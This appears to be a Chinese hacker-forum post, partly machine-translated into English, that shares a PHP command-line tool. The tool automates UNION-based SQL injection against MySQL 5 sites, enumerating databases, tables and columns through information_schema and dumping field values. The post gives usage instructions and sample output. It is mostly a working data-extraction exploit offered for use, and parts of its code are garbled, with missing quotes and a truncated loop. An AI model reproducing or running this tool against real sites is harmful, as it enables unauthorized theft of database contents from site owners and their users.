文章作者:mika 来自于:邪恶八进制
mysql出来5版本以后,注入漏洞要比以前更容易利用了,也可以像mssql那样直接暴取了(甚至比mssql更容易了,因为mssql暴取是需要错误提示开启的,如果错误提示关闭的话,是需要暴力猜解的,而mysql的只要你找准注入点只要可以union出任何一个字段能在页面显示出来就可以了)。自从读了flyh4t的文章《Mysql5注射技巧总结》就一直想测试一下,结果我发现很多的站都更新到了这个版本,于是测试得不易乐呼~~~ 为了节省力气,自然是运用了自己所学的知识写个简单的工具自动暴取,比起手工来要省事多了。觉得会有许多朋友需要这样的工具,我虽然在网上找过包括最新的 pangolin,但是测试结果都不尽如人意。还是自己写的用起来顺手。其实代码没什么技术,但是本着共享的精神,算是提供个工具给大家吧,大家不要笑我哦
工具是php写的(因为俺觉得就这个写起来方便),代码如下:
error_reporting(7);
echo " Mysql ver 5 sql injection exploiter
coded by Mika[EST]
";
if($argc>7 || $argc <2)
{
echo <<
INFO;
die;
}
//****************************************************************************
$url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
$db_name="vuldb";
//****************************************************************************
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
function find_value($url){
global $curl;
//echo $url."
";
curl_setopt($curl,CURLOPT_URL,$url);
$content=curl_exec($curl);
//echo $content;
$re=preg_match("/(||.+?||)/i",$content,$result);
//echo $content;
if($re)
{
//return str_replace(||,,$result[1]);
return $result[1];
}
return 0;
}
function str2ascii($str){
$temp="char(";
for($i=0;$i
$temp.=ord($str[$i]).,;
}
$temp.=ord($str[strlen($str)-1]).);
//echo $temp."
";
return $temp;
}
function exploit_db(){
global $url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,SCHEMA_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.SCHEMATA%20limit%20MIKA_MIKA,1/*";
$i=0;
echo "DATABASES:
";
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_tab(){
global $url,$db_name,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,TABLE_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=".str2ascii($db_name)."%20limit%20MIKA_MIKA,1/*";
echo "Tables of database ".strtoupper($db_name)." :
";
$i=0;
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_field(){
global $table_name,$url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,COLUMN_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.COLUMNS%20where%20TABLE_NAME=".str2ascii($table_name)."%20limit%20MIKA_MIKA,1/*";
$i=0;
echo "columns of table ".strtoupper($table_name)." :
";
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_value($mode=0){
global $db_name,$table_name,$field_name,$condition,$url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,MIKA_MIKA,0x7C7C),$url);
if($mode)
{
$new_url.="%20from%20$db_name.$table_name%20where%20$condition/*";
$new=str_replace(MIKA_MIKA,$field_name,$new_url);
$v1=find_value($new);
echo $v1."
";
return;
}
$new_url.="%20from%20$db_name.$table_name%20limit%20MIKA_NUM,1/*";
$new_url=str_replace(MIKA_MIKA,$field_name,$new_url);
$i=0;
echo "$field_name values of table ".strtoupper($table_name)." :
";
do{
$new=str_replace(MIKA_NUM,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
switch($argc){
case 2:
if($argv[1]==-t)
exploit_tab();
if($argv[1]==-d)
exploit_db();
break;
case 3:
$table_name=$argv[2];
exploit_field();
break;
case 5:
case 6:
$table_name=$argv[2];
$field_name=$argv[4];
exploit_value();
break;
case 7:
$table_name=$argv[2];
$field_name=$argv[4];
$condition=$argv[6];
exploit_value(1);
break;
}
?>
The code is very simple, and I saved a lot of effort. It is just a very rough version, and it is completely convenient. But it is enough to satisfy the requirements of violently extracting field values. Let me briefly explain it below:
The parameters between the two //********* need to be modified directly in the code, because they are too It’s too long and it’s too troublesome to change it on the command line, so it’s better to put it directly in the code. Among them, $url is obviously the vulnerable URL. It must be connected with union, just like what is written in the code, as follows:
http://www.vul.com/display_msg.p... 0union%20select%201 ,2,3,4,5,6,7,8
For example, the 6th number will be displayed on the page, then you should replace the number 6 with "MIKA_MIKA", and do not follow the comment character at the end (because the program will Automatically added when submitting), the final url is as follows:
$url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201 ,2,3,4,5,MIKA_MIKA,7,8";
In addition, $db_name is the name of the database. You can get it directly using the database() function, and then fill it in here.
You can use it after filling it out, it is very simple. Open cmd and switch to the directory where the program is located. For example, to exploit all databases, you can use it like this:
F:scriptsphpmine>php mysql5.php -d
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
DATABASES:
||information_schema||
||vuldb||
Extract table name:
F:scriptsphpmine>php mysql5.php -t
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
Tables of database VULDB :
||Articles||
||Audio||
.
.
.
Omit
.
.
.
Exploit field name:
F:scriptsphpmine>php mysql5.php -t Articles
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
columns of table ARTICLES :
||ID||
||Article_ID||
||Title||
||Type||
.
.
.
Omit
.
.
.
Explosive value:
F:scriptsphpmine>php mysql5.php -t Articles -f Type
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
Type values of table ARTICLES:
||2||
||1||
.
.
.
Omit
.
.
.
In addition, if you want to add your own conditions, you can add the -c parameter at the end and then follow the where condition to limit it (do not include where), for example:
F:scriptsphpmine>php mysql5. php -t Articles -f ID -c Type=2
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
||58||
The program is very simple, but the basic functions are there. I just write whatever I think of, so I will definitely share with you any improvements in the future. There are inevitably errors and areas that can be improved in the code, so please help me make changes together. In addition, there is this line in the code:
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
This is for using the proxy, you can comment it out directly if not needed.
Disclaimer: Please keep the reprint complete. Also, I really hope that everyone will not be too stingy. I have made modifications and additions, and I hope to share them with everyone, although my code is not very good